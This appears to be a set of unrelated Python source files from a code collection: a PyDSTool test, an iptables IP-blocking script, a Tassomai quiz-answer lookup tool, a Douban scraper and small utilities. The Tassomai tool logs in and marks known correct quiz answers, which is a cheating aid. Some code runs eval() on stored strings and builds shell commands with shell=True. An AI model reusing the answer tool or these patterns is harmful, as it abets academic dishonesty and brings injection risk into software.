# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
from numpy import array
import pytest
from PyDSTool import Point
from PyDSTool.Generator import LookupTable
def test_can_build_lookup_table_and_use_it_for_known_values():
"""Functional (a.k.a acceptance) test for LookupTable"""
# John prepares data to be looked up
ts = array([0.1, 1.1, 2.1])
x1 = array([10.2, -1.4, 4.1])
x2 = array([0.1, 0.01, 0.4])
# John calculates "trajectory" for his data
table = LookupTable({
'name': 'lookup',
'tdata': ts,
'ics': dict(zip(['x1', 'x2'], [x1, x2])),
})
traj = table.compute('ltable')
# Now John can retrieve his values from table
for i, t in enumerate(ts):
assert traj(t) == Point({'coordnames': ['x1', 'x2'], 'coordarray': [x1[i], x2[i]]})
assert traj(t, 'x1') == Point({'x1': x1[i]})
assert traj(t, 'x2') == Point({'x2': x2[i]})
# John can get only those values, that he has previously inserted
with pytest.raises(ValueError):
traj(0.4)
with pytest.raises(ValueError):
traj(0.4, 'x1')
with pytest.raises(ValueError):
traj(0.4, 'x2')
|
StarcoderdataPython
|
37710
|
<filename>scripts/review_weblog.py
"""Process what our weblog has.
Run every minute, sigh.
"""
import sys
import subprocess
import psycopg2
THRESHOLD = 30
def logic(counts, family):
"""Should we or should we not, that is the question."""
exe = "iptables" if family == 4 else "ip6tables"
for addr, hits in counts.items():
if len(hits) < THRESHOLD or addr == '127.0.0.1':
continue
# NOTE the insert to the front of the chain
cmd = f"/usr/sbin/{exe} -I INPUT -s {addr} -j DROP"
print(f"{addr} with {len(hits)}/{THRESHOLD} 404s\n{cmd}\nSample 10\n")
for hit in hits[:10]:
print(f"{hit[0]} uri:|{hit[2]}| ref:|{hit[3]}|")
print()
subprocess.call(cmd, shell=True)
def main(argv):
"""Go Main Go."""
family = int(argv[1]) # either 4 or 6
pgconn = psycopg2.connect(
database="mesosite",
host="iemdb-mesosite.local",
user="nobody",
connect_timeout=5,
# gssencmode="disable",
)
cursor = pgconn.cursor()
cursor.execute(
"SELECT valid, client_addr, uri, referer from weblog WHERE "
"http_status = 404 and family(client_addr) = %s ORDER by valid ASC",
(family,),
)
valid = None
counts = {}
for row in cursor:
d = counts.setdefault(row[1], [])
d.append(row)
valid = row[0]
if valid is None:
return
cursor.execute(
"DELETE from weblog where valid <= %s and family(client_addr) = %s",
(valid, family),
)
cursor.close()
pgconn.commit()
logic(counts, family)
if __name__ == "__main__":
main(sys.argv)
|
StarcoderdataPython
|
3386612
|
<gh_stars>10-100
from PyQt5.QtWidgets import QMessageBox, QTreeWidgetItem
from PyQt5.QtGui import QColor, QBrush, QPalette, QFont
from PyQt5.QtCore import QObject, Qt, pyqtSignal
import asyncio
import re
from base.https.tassomai import Tassomai
from base.common import gather_answers
class Lookup:
def __init__(self, base):
self.ui = base
self.tree = self.ui.ui.tree
self.database = self.ui.database.all()
def check_begin(self):
if self.ui.ui.question:
asyncio.run(self.search())
else:
asyncio.run(self.check())
async def check(self):
if self.ui.ui.quiz_url.text().__contains__('courseId=') and self.ui.ui.quiz_url.text().__contains__('playlistId='):
try:
tassomai = Tassomai({})
discipline = int(re.search('\d', self.ui.ui.quiz_url.text())[0])
tassomai.set_discipline(discipline)
email = self.ui.ui.emailTassomai.text()
                password = self.ui.ui.passwordTassomai.text()  # matches the attribute used in ExtraLookup.extra() below
login = await tassomai.login(email, password)
if login == 'error':
msg = QMessageBox()
msg.setWindowTitle("An error occured")
msg.setText("Failed to login to Tassomai.")
msg.setInformativeText("Invalid credentials maybe?")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
return
courseId = int(re.search('courseId=\d+', self.ui.ui.quiz_url.text())[0].strip('courseId='))
playlistId = int(re.search('playlistId=\d+', self.ui.ui.quiz_url.text())[0].strip('playlistId='))
data = await tassomai.special_extract(courseId, playlistId)
for q in data['questions']: # removing double spaces
q['text'] = q['text'].replace(" ", " ")
for ie, ans in enumerate(q['answers']):
q['answers'][ie]['text'] = ans['text'].replace(" ", " ")
data['questions'] = list(sorted(data['questions'], key=lambda k: k['text'])) # sorting the questions in alphabetical order
await self.lookup(data)
except:
msg = QMessageBox()
msg.setWindowTitle("An error occured")
msg.setText("An unknown error occured.")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
else:
print("e")
msg = QMessageBox()
msg.moveToThread(self.ui.lookup_thread)
msg.setWindowTitle("An error occured")
msg.setText("Invalid quiz URL.")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
async def search(self):
self.ui.ui.tree.clear()
question = self.ui.ui.quiz_url.text().strip()
if question == "":
msg = QMessageBox()
msg.setWindowTitle("An error occured")
msg.setText("Input required.")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
return
data = list(filter(lambda k: k.lower().startswith(question.lower()), self.database))
for question in data:
item = QTreeWidgetItem([question])
self.tree.addTopLevelItem(item)
red_brush = QBrush(QColor(155, 0, 0))
green_brush = QBrush(QColor(0, 155, 0))
blue_brush = QBrush(QColor(30, 59, 166))
brush = green_brush
answers = list(self.database[question].keys())
for answer_set in answers:
answers_list = eval(answer_set)
a = self.database[question][answer_set]
current_answers = list(a.keys()) if type(a) == dict else [a]
for answer in answers_list:
child = QTreeWidgetItem(['• ' + answer])
if answer in current_answers:
brush = green_brush
else:
brush = red_brush
child.setForeground(0, brush)
item.addChild(child)
if answers.index(answer_set)+1 < len(answers):
brush = blue_brush
child = QTreeWidgetItem(['-------- OTHER SET OF ANSWERS TO QUESTION --------'])
child.setForeground(0, brush)
item.addChild(child)
async def lookup(self, data):
top = QTreeWidgetItem([data['title']])
font = QFont()
font.setBold(True)
top.setFont(0, font)
self.tree.addTopLevelItem(top)
for index, question in enumerate(data['questions'], start=1):
item = QTreeWidgetItem([f'{index}. ' + question['text']])
top.addChild(item)
red_brush = QBrush(QColor(155, 0, 0))
green_brush = QBrush(QColor(0, 155, 0))
brush = green_brush
answers = []
current_answers = str(gather_answers(question['answers']))
if question['text'] in self.database:
if current_answers in self.database[question['text']]:
db = self.database[question['text']][current_answers]
answers = list(db.keys()) if type(db) == dict else [db]
for answer in question['answers']:
child = QTreeWidgetItem(['• ' + answer['text']])
if len(answers) == 0:
brush = green_brush
elif answer['text'] in answers:
brush = green_brush
else:
brush = red_brush
child.setForeground(0, brush)
item.addChild(child)
class ExtraLookup(QObject, Lookup):
showSubject = pyqtSignal(list)
def __init__(self, base, parent=None):
super().__init__(base=base, parent=parent)
def extra_begin(self):
asyncio.run(self.extra())
async def extra(self):
tassomai = Tassomai({})
email = self.ui.ui.emailTassomai.text()
password = self.ui.ui.passwordTassomai.text()
login = await tassomai.login(email, password)
if login == 'error':
self.ui.ui.extra_lookup.setDisabled(True)
text = self.ui.ui.info_label.text()
self.ui.ui.info_label.setText("INVALID CREDENTIALS")
palette = QPalette()
brush = QBrush(QColor(181, 21, 21))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.WindowText, brush)
palette.setBrush(QPalette.Inactive, QPalette.WindowText, brush)
self.ui.ui.info_label.setPalette(palette)
self.thread().sleep(2)
palette = QPalette()
brush = QBrush(QColor(30, 59, 166))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.WindowText, brush)
palette.setBrush(QPalette.Inactive, QPalette.WindowText, brush)
self.ui.ui.info_label.setPalette(palette)
self.ui.ui.info_label.setText(text)
self.ui.ui.extra_lookup.setDisabled(False)
return
disciplines = await tassomai.extract_disciplines()
tassomai.set_discipline(disciplines[0]['id']) # just in case for some reason the only subject's discipline ID isn't equal to 1
if len(disciplines) > 1:
self.showSubject.emit(disciplines)
await asyncio.sleep(1.00)
while not self.ui.subject.done: # Waiting for user to choose subject and adding time wait between each loop to avoid crash
await asyncio.sleep(0.10)
tassomai.set_discipline(self.ui.subject.discipline)
quizzes = await tassomai.extract_extra_data()
for quiz in quizzes['quizzes']:
data = await tassomai.special_extract(quiz['courseId'], quiz['playlistId'])
for q in data['questions']:
q['text'] = q['text'].replace(" ", " ")
for ie, ans in enumerate(q['answers']):
q['answers'][ie]['text'] = ans['text'].replace(" ", " ")
data['questions'] = list(sorted(data['questions'], key=lambda k: k['text']))
await self.lookup(data)
|
StarcoderdataPython
|
133889
|
"""Top level for tools."""
from .autocorrelation import compute_morans_i
from .branch_length_estimator import IIDExponentialBayesian, IIDExponentialMLE
from .small_parsimony import fitch_count, fitch_hartigan, score_small_parsimony
from .topology import compute_expansion_pvalues
|
StarcoderdataPython
|
3364457
|
# -*- coding: utf-8 -*-
import bs4, pyexcel_xls, random, re, requests, time
from tqdm import tqdm
from collections import OrderedDict
data_save = OrderedDict()
actor_name = []
actor_id = []
actor_movie_count = []
headers = { # request headers
'Host': 'movie.douban.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://movie.douban.com/',
'DNT': '1',
'Connection': 'close'}
def get_actor_name():
data_source = pyexcel_xls.get_data('dataSource.xls')['actorList']
for row in tqdm(range(1, len(data_source))):
actor_name.append(data_source[row][0])
print(actor_name)
def get_actor_id():
url = 'https://movie.douban.com/j/subject_suggest'
for name in tqdm(actor_name):
sleep_momment()
params = {'q': name}
r = requests.get(url, params=params, headers=headers, timeout=2)
for j in r.json():
if j['type'] == 'celebrity':
actor_id.append(j['id'])
break
print(actor_id)
def save_actor_id():
datas = []
datas.append(['index', 'name', 'id'])
for i in range(len(actor_name)):
datas.append([str(i+1), actor_name[i], actor_id[i]])
data_save.update({'actorId': datas})
def get_actor_movie_count():
for id_ in actor_id:
sleep_momment()
url = 'https://movie.douban.com/celebrity/' + id_ + '/movies'
params = {'sortby': 'time', 'start': '0', 'format': 'text', 'role': 'A1'}
r = requests.get(url, params=params, headers=headers, timeout=2)
soup = bs4.BeautifulSoup(r.text, features='lxml')
tag_count = soup.find('h1')
text_count = re.search(r'(作品)\s*\((\S*)\)', tag_count.text).group(2)
actor_movie_count.append(int(text_count))
print(actor_movie_count)
def save_actor_movie_count():
datas = []
datas.append(['index', 'name', 'id', 'movieCount'])
for i in range(len(actor_name)):
datas.append([str(i+1), actor_name[i], actor_id[i], actor_movie_count[i]])
data_save.update({'actorMovieCount': datas})
def get_actor_movie_info():
index = 0
for id_ in actor_id:
if (index>=0):
print(index, '\t', id_, '\t', actor_name[index])
sleep_momment(2, 3)
url = 'https://movie.douban.com/celebrity/' + id_ + '/movies'
pages = actor_movie_count[index] // 25 + 1
movie_href = []
for page in range(pages):
sleep_momment(2, 3)
params = {'sortby': 'time', 'start': str(page*25), 'format': 'text', 'role': 'A1'}
r = requests.get(url, params=params, headers=headers, timeout=5)
r.encoding = 'UTF-8'
soup = bs4.BeautifulSoup(r.text, features='lxml')
tag_movie = soup.find_all(headers='m_name')
for tag in tag_movie:
text_href = tag.a['href']
id_href = re.search(r'(subject/)(\d*)/', text_href).group(2)
movie_href.append('https://movie.douban.com/subject/'+id_href)
movie_data = []
movie_data.append(['title', 'genres', 'year', 'rating'])
for href in tqdm(movie_href):
sleep_momment()
url = href
r = requests.get(url, params=params, headers=headers)
soup = bs4.BeautifulSoup(r.text, features='lxml')
tag_title = soup.find(property='v:itemreviewed')
tag_genres = soup.find_all(property='v:genre')
tag_year = soup.find(class_='year')
tag_rating = soup.find(property='v:average')
try:
text_title = tag_title.text
text_genres = []
for genres in tag_genres:
text_genres.append(genres.text)
text_year = tag_year.text
text_rating = tag_rating.text
except:
text_title = '/'
text_genres = ['/']
text_year = '/'
text_rating = '/'
                    print('\n', id_, href, 'crawl failed!')
movie_data.append([text_title, ','.join(text_genres), text_year, text_rating])
movie_save = OrderedDict()
movie_save.update({'actorMovies': movie_data})
pyexcel_xls.save_data('datas/'+id_+' '+actor_name[actor_id.index(id_)]+'.xls', movie_save)
index += 1
def save_all_data():
pyexcel_xls.save_data('dataSummary.xls', data_save)
def sleep_momment(time_a=0.1, time_b=0.2):
time.sleep(random.uniform(time_a, time_b))
if __name__ == '__main__':
get_actor_name()
get_actor_id()
save_actor_id()
get_actor_movie_count()
save_actor_movie_count()
get_actor_movie_info()
|
StarcoderdataPython
|
162035
|
from tests.utils import W3CTestCase
class TestGridMarginsNoCollapse(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'grid-margins-no-collapse-'))
|
StarcoderdataPython
|
1782643
|
<gh_stars>1-10
from torch.utils.data import Subset
from sklearn.model_selection import train_test_split
import json
import cv2
import numpy as np
import random
def tensor_imwrite(img, name):
temp = np.transpose(img.cpu().numpy(), (1, 2, 0))
temp = (temp * 255).astype(np.uint8)
cv2.imwrite(name, temp)
def numpy_imwrite(img, name):
temp = np.transpose(img, (1, 2, 0))
temp = (temp * 255).astype(np.uint8)
cv2.imwrite(name, temp)
def tensor_visualizer(img_tensor, aug_img_tensor, idx=-1):
if idx == -1:
idx = random.randint(0, len(img_tensor)-1)
img_tensor_len = len(img_tensor)
aug_len = int(len(aug_img_tensor)/len(img_tensor))
tensor_imwrite(img_tensor[idx], "origin.png")
for i in range(aug_len):
tensor_imwrite(aug_img_tensor[idx + img_tensor_len*i], "aug{}.png".format(i))
def average_dicts(array):
result = {}
for key in array[0].keys():
result[key] = []
for dictt in array:
for key in dictt.keys():
result[key].append(dictt[key])
for key in result:
result[key] = sum(result[key]) / len(result[key])
return result
def print_square(dictionary):
for key in dictionary.keys():
if "float" in str(type(dictionary[key])):
newval = round(float(dictionary[key]), 4)
dictionary[key] = newval
front_lens = []
back_lens = []
for key in dictionary.keys():
front_lens.append(len(key))
back_lens.append(len(str(dictionary[key])))
front_len = max(front_lens)
back_len = max(back_lens)
strings = []
for key in dictionary.keys():
string = "| {0:<{2}} | {1:<{3}} |".format(key, dictionary[key], front_len, back_len)
strings.append(string)
max_len = max([len(i) for i in strings])
print("-"*max_len)
for string in strings:
print(string)
print("-" * max_len)
def train_val_dataset(dataset, val_split=0.25):
train_idx, val_idx = train_test_split(list(range(len(dataset))), test_size=val_split)
datasets = {}
datasets['train'] = Subset(dataset, train_idx)
datasets['valid'] = Subset(dataset, val_idx)
return datasets
def get_foldername(_path):
if _path[-1]=="/":
path = _path[:-1]
else:
path = _path[:]
last_idx = -1
for i in range(len(path)):
if path[i] == "/":
last_idx = i
return path[last_idx+1:]
def dict_to_txt(dicti, path):
with open(path, 'w') as file:
file.write(json.dumps(dicti))
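if __name__ == "__main__":
    # Hedged demo (added, not part of the original module): exercises the pure helpers
    # above with made-up metric dictionaries; the file name "summary.txt" is arbitrary.
    fold_metrics = [{"acc": 0.91, "loss": 0.31}, {"acc": 0.89, "loss": 0.35}]
    summary = average_dicts(fold_metrics)
    print_square(summary)
    dict_to_txt(summary, "summary.txt")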
|
StarcoderdataPython
|